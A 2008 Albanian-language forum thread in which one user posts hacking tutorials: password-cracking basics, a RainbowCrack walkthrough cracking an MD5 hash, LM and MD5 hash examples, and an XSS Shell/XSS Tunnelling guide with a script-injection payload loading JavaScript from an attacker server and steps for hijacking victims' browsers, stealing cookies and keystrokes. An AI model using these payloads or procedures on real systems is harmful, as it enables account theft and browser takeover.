Lajme
October 07, 2008, 02:22:54 PM
nga leoo
October 07, 2008, 09:11:51 AM
Video e javës


   Prova per te thyer rekordin boteror per mesazhin me te shpejte!

Diskutimet e fundit
Kenaqesia e gatimit 8
by riggie
[Today at 04:59:57 AM]
Shkronja e fundit
by idnemzaG
[October 07, 2008, 11:37:18 PM]
AMD ndahet në dy pjesë
by JonSaraqini
[October 07, 2008, 02:22:54 PM]
Televizori 3D holografik ...
by leoo
[October 07, 2008, 09:11:51 AM]
[?] Cilen pjese te "Kenaq...
by leoo
[October 07, 2008, 08:42:53 AM]
VIRUS I RI
by riggie
[October 07, 2008, 08:39:58 AM]
Del me sukses eksperiment...
by riggie
[October 07, 2008, 08:38:43 AM]
Prezantim per Home Networ...
by theDirector3
[October 07, 2008, 06:54:46 AM]
Webfaqja zyrtare maqedona...
by forumivirtual
[October 06, 2008, 10:46:58 PM]
Linux Wireless !
by heroidi
[October 05, 2008, 07:23:55 PM]
Sharp BDV-22 = BluRay + V...
by leoo
[October 05, 2008, 04:16:17 PM]
Dell Precision M6400
by leoo
[October 05, 2008, 04:13:40 PM]
Çipat DirectX 11 vijnë në...
by leoo
[October 05, 2008, 12:34:31 PM]
Qysh me shpejtu µTorrent-...
by heroidi
[October 05, 2008, 12:05:53 AM]
Interneti në Aeoroplan
by JonSaraqini
[October 04, 2008, 02:39:12 PM]
Hardware & Software Tetor...
by JonSaraqini
[October 04, 2008, 02:37:32 PM]
Google Toolbar 5 beta për...
by JonSaraqini
[October 04, 2008, 02:35:18 PM]

*Interesante: Yjet gjigand.
Del.icio.us Digg FURL FaceBook Stumble Upon Reddit SlashDot Ask BlinkBits BlinkList Co.mments Delirious Feed Me Links Google Bookmarks Linkagogo Ma.gnolia MSN Live Netscape Netvouz Newsvine RawSugar Rojo Smarking Socializer Sphinn Spurl Squidoo Tailrank Technorati Yahoo My Web

+  ayih ORG
|-+  Zona jeshile
| |-+  ZONË E LIRË
| | |-+  Some papers from me!
Pages: [1] 2 3  All |   Go Down
« previous next »
  Send this topic  |  Print  
Topic: Some papers from me!  (Read 1027 times)
« on: July 19, 2008, 07:11:14 PM »
logic Offline
Jr. Member

 **
Posts: 60
NOTE: Me sa pashe ende nuk kishit krijuar nje teme per mesime, ateher do i postoj ketu..

~~~~~~~~~~~~~~~~~~~~~~~~
Author: Logic
Tutorial: Password Basics
~~~~~~~~~~~~~~~~~~~~~~~~

Çfarë janë fjalëkalimet bazike?

Shumica e llogarive (accounts) në një sistem kompjuteri zakonisht kanë disa metoda kufizimi të llogarive, zakonisht në formë fjalëkalimi. Kur të kesh të drejta në sistem, përdoruesit i duhet të shkruaj një ID te vlefshme për ta përdor sistemin, e ndjekur nga një fjalëkalim që ta përdor llogarinë. Shumica e sistemeve nuk e pasqyrojnë në shesh fjalëkalimin ashtu siç është shtypur, ose ata e shkruajnë nga një yll për çdo karakter.

Në shumicën e sistemeve fjalëkalimi është i nisur ndërmjet disa algoritmeve që prodhojnë të ashtuquajturën hash (që do të thotë një përzierje, rrëmuje). Hash, pra është zakonisht më shumë se një përzierje e versioneve origjinale të tekstit që e krijojnë fjalëkalimin, është zakonisht hash njëkahësh. Hashi njëkahësh është varg i karaktereve të cilat nuk mund të konvertohen në tekst. Pra, shumica e sistemeve nuk i dekodojnë fjalëkalimet e ruajtura gjatë vërtetimit, ata i ruajnë në hashe njëkahësore. Gjatë procesit të kyçjes, ti e plotëson llogarinë me emrin dhe fjalëkalimin. Fjalëkalimi niset nëpërmes një algoritmi që prodhon hashe njëkahësore. Ky hash është i krahasuar me hashin e ruajtur në sistem. Nëse janë të njëjtë, do të tregoje së fjalëkalimi është aprovuar.

Të flasim, disa algoritme janë më të mira se disa tjera në prodhimin e hasheve njëkahësorësh. Të gjitha sistemet operative të cilat i mbulojmë këtu -- Windows and Unix – të gjitha përdorin algoritme të cilat janë të krijuara publikisht dhe janë shikuar dhe vëzhguar në disa shkalle.

Të thyesh një fjalëkalim kërkohet të kopjosh hashin njëkahësor të ruajtur në ndonjë sistem, dhe atëherë duke përdorur algoritmet prodhojnë hashin tënd deri sa të ketë një përputhje. Kur të përputhen, sidoqoftë fjala që përdoret ju të prodhoni hashin tuaj do t’iu lejoj juve të kyçeni në sistem. Ka shume “freeware password cracker” të gatshëm në internet për Windows and Unix.

Pse mbrohen hashet?

Nëse hashet një kahësore nuk janë fjalëkalimet vet por derivate matematike, pse duhet të mbrohen? Mire, atëherë që nga i dimë algoritmet, një thyes fjalëkalimesh mund të përdoret thjesht që të dekodoj fjalëkalimet e mundshme dhe ti krahasoj me hashet njëkahëshe derisa sa të ketë përputhje. Ekzistojnë dy mënyra për në ketë rrugë -- “dictionary” dhe “brute-force”.

Zakonisht hashet janë të ruajtura në pjesë të sistemit që kanë ekstra sigurim që të limitojnë qasjen nga cracker-et e mundshëm.

Çka është “dictionary” thyesh fjalëkalimesh?

Një fjalor (dictionary) thyesh fjalëkalimesh thjesht merr një listë të fjalëve të fjalorëve, dhe i kodon ato që të shikon nëse kodohen me ato hashet një kahëshe nga sistemi. Nëse hashet janë të barabarta, fjalëkalimi konsiderohet i thyer, dhe fjala që është përdorur nga fjalori është fjalëkalimi.

Disa nga këta thyesh fjalorësh (dictionary crackers) mund të manipulojnë secilën fjalë në listën e fjalëve duke përdorur filtra. Këto filtra i mundësojnë të ndërrojnë: “hacker” në “h4ck3r” dhe mënyra të tjera të avancuara. Më të mirët e njohur nga këta filtër janë rregullat të cilat vijnë me “Crack”(per Unix). Këto rregulla filtrimi janë shumë të popullarizuara dhe përdoren të thyhen aplikacione të windowsit.

Nëse je ti një “dictionary cracker” nuk do të kesh rregulla manipulimesh, ti mund të kombinosh me listën e fjalëve. Ka shume vegla të mira për manipulimin e listave të fjalëve që ju mundësojnë të gjitha llojet e filtrave. Me një punë të vogël, ti mund të kthesh një koleksion të vogël fjalësh në një listë gjigante.

Çka është “brute-force” thyesh fjalëkalimesh?

“Brute force” thyesi thjesht provon të gjitha fjalëkalimet e mundshme deri sa të merr fjalëkalimin e duhur. Nga një perspektive e thyesit, kjo të merr shumë kohë. Sido që të jetë, nëse i jep kohe të mjaftueshme dhe fuqi të CPU fjalëkalimi eventualisht mund të thyhet.

Pothuaj të gjithë “brute force” thyesit modern lejojnë numër te opsioneve të zgjedhësh, si maksimumi i zgjatjes së fjalëkalimit ose karakteret që të bëj “brute force”.

Cila është metoda më e mirë e thyerjes?

Vërtet kjo bazohet në cakun tuaj, aplikacionin thyesh që ke, dhe sistemin operativ që po mundohesh të thyesh. Lë të shkojmë në mes disa plan veprimeve.

Nëse caku juaj është të kesh qasje në një sistem. Me fjalëkalimin që din, ti ke llogarinë e përdoruesit dhe hashin. Një “dictionary attack” duket se është më e shpejta metodë. Kjo është tipike nëse ke një metodë bazike që të kesh qasje të marrësh statusin e pronarit.

Nëse je duke thyer një program mund të bëjnë që të dyja “dictionary” dhe “brute force”, dhe që të dyja janë si të ngadalshme, ti dëshiron vetëm të hedhesh një sulm “brute force” dhe pastaj të shikosh rreth ditës. Nga të gjitha kuptimet unë të rekomandoj një sulm “dicitonary” me liste fjalësh të kombinuara, të ndjekur me brute force vetëm nëse llogarite të cilat vërtet po ju donë fjalëkalimet.

Ty të duhet para-përpunimet e listës së fjalëve nëse makina të cilën ti je ka shkon të thyesh nga kompjuteri yt duhet të jetë e forte. P.sh. disa kompjuter të ngadalshëm ju merr shumë kohë, shumë që të kryejnë punën e tyre me “brute-force” apo me “dictionary”.
Shumë hacker serioz kanë lista të mëdha të rregulluara dhe të kombinuara mirë që i përshtaten dhe i duhen.

Çka është “salt”?

Që të zhvillosh punën në thyerjen fjalëkalimeve, disa algoritme punësojnë “salts” që të shtojnë më tej komplikimin dhe vështirësitë në thyerjen e fjalëkalimeve. Këto “salts” janë që nga 2 deri ne 8 bit të gjata, dhe algoritmet njoftojnë për shtimin e errësirës në hashet një kahësore. Në rendësi të madhe sistemet operative mbulojnë ketë, vetëm Windows nuk përdor “salt”. Sistemi Unix përdor “salt” dhe mbulon pjesë individuale te fjalëkalimeve.

Cili është rreziku i thyerjes së fjalëkalimeve?

Rreziku është i thjesht, dhe i vërtet. Nëse je zëne me një fajll fjalëkalimesh nga sistemet ti nuk do të kesh të drejta qasje më në të, ti teknikisht je në pozicionin e vjedhësit në syt e përfaqësuesve te ligjit.
Nisjen e një programi thyes (cracking software) në fshehtësi në shtëpinë tënde i ka përparësitë e lejimit tënd që të hedhesh të gjitha fuqitë kompjuterike që ke në dispozicion në një fjalëkalim, por nëse kapesh atëherë është një pune e vogël të zbulohesh se po e kryen punën e thyerjes së fjalëkalimeve, por janë disa mundësi të vogla që mund të bësh për mbrojtjen e vetes.
Logged
« Reply #1 on: July 19, 2008, 07:12:24 PM »
logic Offline
Jr. Member

 **
Posts: 60
Rainbow Tables


Shpjegimi i Tabelave Rainbow (Ylber)

Pra çka janë saktësisht tabelat rainbow? Tabelat Rainbow janë gjenerata e re e cracking, duke përdorur metoda të avancuara për thyerjen e fjalëkalimeve të enkriptuara me algoritme siç është Message Digest 5 (MD5) ose LanManager (LM). Tabelat Rainbow janë bërë më të popullarizuara dhe të njohura për shpejtësinë e thyerjes së fjalëkalimeve të enkriptuara me ato algoritme. Është thelbësore që të ecësh me kohën në teknologji; për ketë arsye, ky paper do të ju mësoj gjithçka për tabelat rainbow dhe si po përdoren dhe aplikohen në ditët e sotme.
Tabela rainbow është një lloj special i kërkimit. Është si kërkim i fjalëve në një skedar teksti, por më shumë i komplikuar. Tabelat rainbow përdorin time-memory trade-off (shpjegohet më vonë) që të zvogëloj kohën që të thyej (to crack) tekstin e koduar (fjalët të enkriptuara) në tekst të kuptueshëm. Algoritmet md5 dhe lm janë njëkahësore, që donë të thotë nuk mund të dekriptohen (dekodohen), por ato mund të shikohen për ngjashmëri.

Time-Memory Trade-Off

Metoda tradicionale për thyerjen e fjalëkalimeve është brute forcing, e cila thjesht vetëm do ti provoje të gjitha fjalët në listë një nga një. Kjo rruge të konsumon shumë kohë për thyerjen e fjalëkalimeve. Pajisja e Philippe Oechslin metoda time-memory trade-off e zvogëlimit të kohës së kriptoanalizës duke përdorur të dhëna paraprake të ruajtura në memorie, është burimi që përdoret në rainbow talbes. Ideja e time-memory trade-off është që të bëj të gjithë kohën e thyerjes llogaritje të avancuara dhe të ruaj rezultatet në fajllet përkatese (rainbow talbes).
Procesi i para- zvogëlimit të tabelave rainbow do të merr një kohë të caktuar. Sidoqoftë, kur të gjitha tabelat janë krijuar, time-memory trade-off cracker është njëqind herë më i shpejt se një brute force tradicional. Time-memory trade-off ka bere revolucion në thyerjen e fjalëkalimeve që ka bërë zvogëlimin e kohës në kriptoanalizë. Që të arrijmë përfundim, pra time-memory trade-off është përdorur në tabelat rainbow që të shpejtoj kohën që duhet për thyerjen e tekstit të koduar.

Ngritja e programit

Ka shumëllojshmëri të programeve për krjimin e tabelave rainbow dhe time-memory trade-off crackers. Për hir të këtij mësimi dhe për preferenca personale unë do të përdori RainbowCrack i cili është i mundshme të shkarkohet (Free) në http://www.antsight.com/zsl/rainbowcrack/. Nëse nuk e parapëlqen RainbowCrack dhe po kërkon për rainbow table generator dhe time-memory trade-off cracker shiko për Winrtgen dhe Cain&Abel, të cilat janë që të dyja të mundshme për shkarkim në http://www.oxid.it/projects.html (Free).
Fillojmë të shkarkojmë dhe të instalojmë RainbowCrack. Ekstraktoni përmbajtjen e tij në direktorinë e preferuar; unë kam marrë “E:\” për ketë mësim, dhe riemëro skedarin në diç si “rainbowcrack”. Pas ekstraktimit do të duhet te duket kështu disi si në Figurën 1.1, të mëposhtme:




Nëse dëshiron, mund të kesh një shikim të parë në ReadMe, por nuk është e nevojshme. Nëse aty nuk ka pasur gabime në ekstraktim dhe fajlli përmban ato që ka arkiva zip që shkarkuat nga faqja krysore Project RainbowCrack, atëherë ti ke instaluar me sukses RainbowCrack në kompjuterin tënd.

Generating Rainbow Tables

Para se të fillosh të thyesh hashet ty të duhet të kesh një sasi të mirë të tabelave rainbow të mundshme. Prandaj, gjatë kësaj pjese procesi i krijimit të tabelave rainbow është i mbuluar. Sasia e hapësirës që ti dëshiron të caktosh për tabelat rainbow normal varet nga preferencat tuja. Nëse ke ndër 100gb unë do të rekomandoja krijimin e shumë tabela rainbow.
Programi që përdoret për krijimin e tabelave rainbow është “rtgen”, i lokalizuar në direktorinë e rainbowcrack që e krijuam më herët. Për krijimin e tabelave rainbow ty të duhet të caktosh argumente specifike, këto argumente përmbajnë:

hash algorithm \ character set \ plaintext length minimum \ plaintext length maximum \
rainbow table index \ rainbow chain legth \ rainbow chain count \ file title suffix

Hash algorithm options: algorithm of choice (exp: md5)
Character set: located in the RainbowCrack directory as charset.txt, can be
modified (exp: alpha-numeric [123456789ABCDEFGHIJKLMNOPQRSTUV])
Plaintext length minimum: Minimum characters in each word (exp: 1)
Plaintext length maximum: Maximum amount of characters in each word(exp:8 )
Rainbow Table Index: The index of the rainbow table (exp: 0)
Rainbow Chain Length: The length of the rainbow chain (exp: 11300)
Rainbow Chain Count: The amount of rainbow chains to generate (exp: 6000)
File Title Suffix: This is used for rainbow tables which are to be linked with
eachother to prevent duplicating (exp: 0)

Para fillimit të krijimit të tabelave është ide e mirë që të kontrollosh dhe të shikosh vlershmin e përafërt të sasisë së kohës që tabela do të merr në krijim. Për të bërë ketë përdore argumentin “-bench” në fund të argumenteve (me përjashtim të rainbow chain count/length dhe prapashtesën e argumenteve të titullit të fajllit). Për të bërë ketë së pari hape cmd promt (sepse rtgen është një aplikacion konzole) pastaj cd te direktoria rainbow crack (ku instaluat rainbow crack). Shiko Figurën 1.2 poshtë.



Tani ju duhet të jeni në direktorinë raibowcrack, si në Figurën 1.3 poshtë.



Tani pasi jeni në direktorinë RainbowCrack të duhet të nisësh ‘rtgen.exe’ ose krijuesin e tabelave rainbow pastaj ti mund të nisësh krijimin e tabelave rainbow.
Le ta nisim rtgen dhe të shikojmë çfarë ndodhë, shiko Figurën 1.4 poshtë.



Siç po mund të shikosh janë vetëm argumentet (folëm më parë)që rtgen kërkon që të krijon tabelë bazuar në argumentet e kërkuara nga përdoruesi. Tani pasi e dimë se si punon programi, le të krijojmë rainbow tabelën tonë të parë. Para se mund të krijosh, është ide e mirë që të shikojmë ose ta kemi në mendje se sa kohe do të na merr që të krijohet. Për të bërë ketë përdore argumentin –bench, shiko Figurën 1.5 poshtë.



Pasi ta kesh testuar dhe e ke shikuar sa gjate do të shkojë procesi i krijimit, ti je i gatshëm për krijimin. Pjesa dëshpëruese rreth procesit të krijimit është se zakonisht të merr kohe të gjatë të pabesueshme. Nëse ke kompjuter të shumëfishte, atëherë krijimi i tabelave rainbow nuk do të merr shumë kohe.
Rainbow tabelat e caktuara janë vetëm se rainbow tabela bazuar në njëra tjetrën, për shembull ti nuk mund të kesh 39GB rainbow tabela sepse kompjuteri yt s’mund të përmbaj ketë madhësi të madhe. Sidoqoftë, ti mund të kesh 39GB me 1GB tabela; ti mund ta bësh ketë duke pasur indekse në tabelat tuaja. Rtgen e din që nëse indeksi është 1 dhe aty është edhe një 0 indeks tabelë atëherë nuk do të ri krijojë të njëjtat përmbajtje që ishin në tabelën e parë (0 tabela). Në parim, tabelat rainbow të caktuara të lejon ty që të kesh tabela të shumëfishta të cilat janë një tabelë gjigante, veçse e ndarë në pjesë të caktuara.
Në Figurën 1.6 poshtë, aty janë 1”basic 1-3 character lower-alpha char.set rainbow table generating.” Pas krijimit do duhet të duket disi si në Figurën 1.7.





Pasi procesi i krijimit është kompletuar, ty të duhet ti radhitësh tabelat rainbow duke përdorur rtsort, i gjithë ky program bën organizmin e tabelave rainbow të reja. Shiko Figurën 1.8 poshtë, kur rainbow tabela e mëparshme që është krijuar në Figurën 1.7 është duke u radhitur.



Pasi krijimi dhe radhitja është kompletuar është koha që ti testojmë tabelat rainbow.

Cracking Hashes (Thyerja e hasheve)

Algoritmi e tabelës rainbow të cilin sapo e krijuam është MD5 le të shkojmë të enkriptojmë një tekst të thjesht me algoritme. Janë me tona online MD5 encryptors në internet, që të bëjmë me lehtë mund të shkosh të shfletosh në google MD5 encryptor.
Mbaje në mend kur ta miraton ndonjë fjale të thjesht, bëhu i sigurt për përputhjen e karaktereve të përdorura më herët në krijimin e tabelave rainbow. Për në ketë paper, unë do të enkriptoj ‘ad’ (pa thonjëza) me md5 algoritëm. Pastaj do të shikoj të përpiqem ta thyej hashin me rainbow table. Kjo vërtet është vetëm të testohet aftësia e rainbowtable.

ad: 523af537946b79c4f8369ed39b a78605

Tani rainbow tabela duhet të jete në gjende të thyej hashin dhe të jep tekstin ‘ad’. Programi i përdorur është rcrack, argumentet për të janë të lehta, ti në të vërtet mund të nisesh të gjitha rainbow tabelat në një direktori me të, por në ketë mësim ne do të përdorim vetëm një rainbow tabel. Në Figurën 1.9 (poshtë) ‘rcrack’ po kërkon për hash në rainbow tabelën.



Ne Figurën 2.1 (poshtë) ti mund të shohësh se rainbow tabela funksionoj.



Urime! Ti ke krijuar dhe ruajtur me sukses një rainbow tabel dhe e përdore për të thyer një hash të thjesht. Me ‘rcrack’ janë edhe dy argumente tjera përveç (-h). Ti ke –p e cila përmban një grumbullim fajllash të fjalëkalimeve. Ke edhe –I, që përmban një fajll teksti me hashe të shumta. Pra ti mund të thyesh hashe të shumëfishta në një sezon.


FUND

Gjatë këtij mësimi, fjala ‘crack’ thyerje është përdorur; sidoqoftë, hashet në të vërtet kurrë nuk thyhen ‘cracked’. MD5 dhe LM algoritmet ende nuk janë thyer ‘cracked’, ato janë algoritme një kahësore dhe vetëm mund të shikohen për ngjashmëri. Pra në të vërtet nëse thua “Unë po thyej ketë hash me rainbow tabelen time”, ti je gabim.
Logged
« Reply #2 on: July 19, 2008, 07:13:11 PM »
logic Offline
Jr. Member

 **
Posts: 60
LAN Man Hash (LM)

Lan Man Hash (LM) është një Microsoft algoritëm i enkriptuar që përdoret të enkriptoj fjalëkalimet për Windows NT, 95, 98, ME 2000, XP, dhe 2003 Server. Megjithëse në versionet e fundit të Windows (XP, 2003, Vista) Microsoft i ka ndërruar të NTLM për shumicën e enkriptimeve, por LM është ende shumë i përdorur. LM është krijuar që ti merr përdoruesit fjalëkalimet dhe ti konvertoj ato në të gjitha shkronja të mëdha dhe ato ti ndajë fjalëkalimet në dy gjysma nga shtate karaktere. Secila gjysmë me shtatë karaktere është i konvertuar në fjalëkalim “bit hash” dhe pastaj të dy gjysmat janë të kombinuara që krijojnë një 32 bit hash e cila është hashi i kompletuar LM.

ED39C160E34521DCBF02B3DFE2 30653A = CERT276ROSENVA
ED39C160E34521DC__________ BF02B3DFE230653A=_______ CERT276______ROSENVA
1st 7 upper Encrypted______2nd 7 Upper encrypted________pass^________pass^


Message Digest Five (MD5)

MD5 hashi është një 128-bit (16-byte) hash dhe janë përfaqësues tipik si numra hexadecimal 32-digit. MD5 (Message-Degest algoritëm 5) ishte dizajnuar nga Ronald Rivest në 1991 dhe ishte krijuar të zëvendësoj algoritmet e vjetra. Sot MD5 hashi është se tepërmi është i përdorur dhe pjesa më e madhe janë të siguruara. Gjeja më e mirë të kujtosh është se me çdo fjalëkalim të duhet të besh atë të komplikuar dhe të gjatë. Fjalëkalimet më të mira janë 15 karaktere ose me fjalëkalimet të gjatë që përmbajnë shkronja të mëdha, të vogla, numra dhe karaktere speciale gjithashtu.


MD5 Hash Example:
16d2c02aad8d116bc403f73454 a5eeb1 = emocan
32-Digit Hash______________________ __pass^

Cain & Able
CCNA, CSE, CCAI, MCP, Network+

Në rregull po e filloje ketë artikull me vendin ku mund ta shkarkoni programin Cain & Able: www.oxid.it.
Çfarë është mund te pyesni? Pra është si një mbulesë për rrjetin tuaj. Cain & Abel është një vegël gjetje fjalëkalimesh për sistemet operative Microsoft. Të lejon lehte gjetjen e fjalëkalimeve të ndryshme me gjurmimin dhe skanimin e rrjetit, thyerjen e fjalëkalimeve të enkriptuara duke përdor “Dictionary, Brute-Force dhe Cryptanalysis attacks (Rainbow Tables)”, dekodimin e fjalëkalime të veshtira, zbulimin e fjalëkalimit dhe analizimin e protokolleve. Ky program ju lejon dhe mbulimin e IP dhe MAC që t’iu bëni jetën e mundimshme adminava duke provuar që t’u kapin në subnet. Gjera tjera që mund të ofrojë Cain është WiFi scanning, Cisco config downloading (via SNMP), propozohet për kompjuterët portativ, dhe shumë gjëra me NetBIOS skanimin e domeinava etj...
Logged
« Reply #3 on: July 19, 2008, 07:14:48 PM »
daFührer 		qendrimi^ Online
mnmlcus.
special members
Sr. Member

 *****
Posts: 273
bravo bravo man seriozisht sene tvyjshme
Logged
deadmau5
« Reply #4 on: July 19, 2008, 07:16:25 PM »
logic Offline
Jr. Member

 **
Posts: 60

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author: Logic
Tutorial: XSS Tunnelling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

XSS Tunnelling
Në gjendje për ta kuptuar çka është XSS Tunneling dhe si punon, në fillim të duhet të kuptosh çka është XSS Channel dhe si funksionon XSS Channel.

Ky mësim iu dedikohet atyre të cilët janë pak a shumë të njohur me sulmet XSS.

Çka është një XSS Channel?
Një XSS Channel është një komunikate interaktive në mes dy sistemeve i cili është i hapur me një sulm XSS. Në nivelin teknik, është një tip i AJAX aplikacioni i cili mund merr komanda, i kthen reagimet prapa dhe është në gjendje të flas cross-domain.

XSS Shell është një vegël e cila mund të përdoret të lidh një XSS Channel në mes të viktimës dhe një sulmuesi, ashtu që sulmuesi të kontrollon shfletuesin e viktimës duke i dërguar komanda. Kjo komunikate është dy-drejtimesh.

Për të marr një XSS Shell që të punoj, një sulmues duhet të injektoj Javascriptin e XSS Shellit në lidhje me rrugën e një XSS sulmuesi. Atëherë sulmuesi është në gjendje të kontrolloj viktimën. Pas këtij hapi, sulmuesi mund të shikoj kërkesat, reagimet dhe është në gjendje të udhëzoj viktimën të zbatoj kërkesat etj.

Një shembull i sulmit injektues është paraqitur poshtë:

*******************************************
http://example.com/q="><script                             *
*  src="http://xssshellserver/xssshell.asp"></script>      *
*******************************************

Si punon një XSS Shell?



XSS Shell është një aplikacion i cili i ka tri pjesë.

E para, server-side e XSS Shell koordinon XSS Shell-in në mes sulmuesit dhe viktimës. Është një server-side aplikacioni dhe kërkon një ASP dhe ISS ueb server. Përdor MS Access databaza si depo.

Pjesa e dytë e veglës është një client-side dhe është i shkruar në JavaScript. Kjo ngarkohet në kërkuesin e viktimës dhe është përgjegjëse për dërgesën dhe procedimin e komandave së bashku me furnizimin e kanalit në mes viktimës dhe sulmuesit. Ky kodë është testuar në Firefox, IE6 dhe IE7.

Pjesa finale e XSS Shell-it është ndërhyrja administrive. Një sulmues mund të dërgoj komanda dhe të pranoj përgjigjet nga shfletuesi i viktimës. Në anën tjetër është ASP që kërkon IIS.



Të gjithë hapat e ndjekur, mos prit për secilin që vazhdimisht të kërkojnë për përgjigjet dhe kërkesat në kohe të caktuar.

1.   Një sulmues infekton një uebsite me qëndrueshmëri (me vazhdimësi) me një sulm XSS i cili thërret Remote XSS Shell JavaScript.
2.   Viktima ndjek një link ose viziton një faqe ku i ekzekutuhohet JavaScript-i brenda domainit.
3.   Shfletuesi i viktimës fillon të kryej kërkesat e serverit të XSS Shell-it dhe kërkon për komanda të reja.
4.   Kur shfletuesi i viktimës merr një komandë të re p.sh. si (Get Cookies, Execute custom JavaScript, Get Key logger Data etc.) është e mundshme dhe i kthen rezultatet të XSS Shell.
5.   Sulmuesi mund të shtyp komanda të reja të shfletuesi i viktimës-ave dhe të shikon rezultatet nga ndërhyrja administrive e XSS Shell.

Pikat e interesimit

● XSS Shell komunikata bazohet në remote JavaScript ngarkesën në gjendje që të kalon sigurimin.
● Në ekzekutimin e parë, XSS Shell ri-gjeneron faqen. Kështu që viktima të ndjek linkun; XSS Shell do të mbetet në faqe dhe pastaj, do të lejon sulmuesin të kontrollon shfletuesin e viktimës. Deri sa viktima të pranon atë dritare (edhe nëse viktima ndjek ndonjë link në ndonjë website tjetër) seanca e viktimës do të hapet dhe shfletuesi do të ndjek komandat e sulmuesit.
● Disa XSS Shell komanda janë të paraqitura më poshtë:
      -Get Cookie
      -Get Current Page
      -Execute custom Javascript
      -Get Mouse Log
      -Get Keylogger Data
      -Get Clipboard
      -Get Internal IP Address (Firefox – JVM)
      -Check visited links (CSS histori hack)
      -Crash Browser (nëse nuk të pëlqen viktima! )
● Është një burim i hapur dhe është lehte të fusim komanda të reja si skanimi i porteve.
● XSS Shell është shumë i rrezikshëm në qëndrueshmëri me XSS vulnerabilities. Pikërisht që fakti që një sulmues mund të infektoj qindra shfletues dhe ti menaxhon ato njëherësh.

Pse është më i mirë se sulëm klasik i XSS?
● Një sulmues do të ketë më shume se një viktimë. Pasi ta kontrollosh shfletuesit e viktimës(viktimave) sulmuesi do të jete në gjendje të vendos për hapin tjetër duke u bazuar ne përgjigjet dhe ambientin e ndodhur.
● Do të lejoj ty që të kalosh këta hapa:
      IP Restrictions
      Basic/NTLM Auth Based or smilar authentications.
● Ashtu që është e mundur të ju dërgosh alert(“owned!”) te mijëra viktima dhe të krijosh një temporary XSS powered botnet!


Çka është XSS Tunnelling?
Tunnelling është një mënyrë ku shkëmbehen të dhënat në mes dy networkave mirë.
XSS Tunnelling është lidhja e trafikut të HTTP ndërmjet XSS Channel për të përdor praktikisht cilindo aplikacion që mbështet HTTP proxies.

Çka është XSS Tunnel?
XSS Tunnel është standard HTTP proxy e cila është e ulur në një sistem të sulmuesit. Cilado vegël e cila është e konfiguruar të përdoret do të bën galerinë (skrofullën, tunelin) nëpërmes XSS Channel aktive në serverin e XSS Shell. XSS Tunnel konverton kërkesat dhe përgjigjet sinqertë që të vërtetoj HTTP përgjigjet dhe XSS Shell kërkesat.

XSS Tunnel është e shkruar në .NET dhe kërkon .NET Framework që të punoj. Është një GPL aplikacioni në burim të hapur i licencuar (Licensed open source application).



Dobia nga XSS Tunnelling
  -Do të bëj të mundshme pothuaj çdo vegël që mbështet HTTP Proxies!
  -Është e mundshme të përdoret ndonjë vegël automatike siç është Nikto, SQL Injectors, HTTP brute-forcer kundër ndonjë IP fushe të kufizuar te ndonjë uebsajt.
  -Është shumë e mirë për demonstrimin e rezultateve të një sulëmi XSS.



Si punon XSS Tunnel?

1.   XSS Tunnel lidhet te një XSS Shell i caktuar dhe përdor identitetin e viktimës së tanishme (viktima që të kontrollohet).
2.   HTTP klienti lokal (browser, Nikto etj.) dërgon HTTP kërkesa te XSS Tunnel
       -XSS Tunnel konverton kërkesat e HTTP në kërkesa të cilat XSS Shell mund ti kuptoj dhe të procedoj. Pastaj këto kërkesa i dërgon te XSS Shell Server.
       -XSS Shell Server ruan këto kërkesa në databazën (Te gjitha këto kërkesa punojnë vetëm për viktima specifike përmes XSS Tunnel. Kjo ID mund të shihet në “dashboard” e XSS Tunnel.)
3.   Klienti XSS Shell (i cili rrinë në JavaScript në shfletuesin e viktimës) përmban kërkesa periodike për XSS Shell Server dhe shikon për komanda të reja të procedon.

Procesi i sulmit
1.   Fillo XSS Shell Server,
2.   Konfiguro XSS Tunnel për të përdorur XSS Shell Server,
3.   Përgatit sulmin XSS (paraqite të një vulnerable uebsajt ose dërgo ndonjë link etc.),
4.   Starto XSS Tunnel dhe prit për viktimën,
5.   Konfiguro veglën ose shfletuesin për të përdorur XSS Tunnel,
6.   Kur të shikon ndonjë viktimë në XSS Tunnel, starto të përdoresh shfletuesin / veglën për domainin e planifikuar.
Logged
« Reply #5 on: July 19, 2008, 07:17:21 PM »
logic Offline
Jr. Member

 **
Posts: 60

Etika e një hackeri të vërtet!

Ky është artikulli i parë që po shkruaj, dhe arsyja që vendosa të shkruaj është për temen më të pelqyer timen, e cila është “computer hacking”. Tash nuk është që të jeni hutuar me “system cracking” e cila natyrisht është akti i të pamendëve të cilët thyejnë sisteme, shpërndajnë viruse, dhe bëjnë gjëra të cilat i lëndojnë njerëzit e pafajshëm të cilët nuk ia kane idenë për botën e sigurimit.  Mirë tani më lejoni të shkruaj për pikën kryesore të këtij artikulli. Do t’iu sqarohet të gjithëve të cilët e thërrasin veten “hacker”.
Këtu është e paraqitur një “paper” e cila paraqet se çfarë një “hacker” në të vërtet është.

Të gjithë ju fillestarët të cilët po hyni në botën e mrekullueshme të hacking, vej bast që hytë në hacking sepse deshët që të bëheni një ndër elitat e hackerëve ashtu si në filma apo. Më lejo të them diçka tani, tani ju as që të ju shkoj në mend që do të bëheni si ekipa e James Bondit të cilët marrin të dhënat ushtarake në sekonda, thjesht nuk është e mundur. Është rast shumë i rralle që dikush në të vërtet mund të hyj në sisteme që ka informata shumë të rëndësishme e te mos kapet. Të kapesh gati që nuk mund ti shmangesh. Edhe ata të cilët kanë vite eksperiencë në sigurim dhe programim në një mision të tillë do të kenë shume punë të mundimshme.
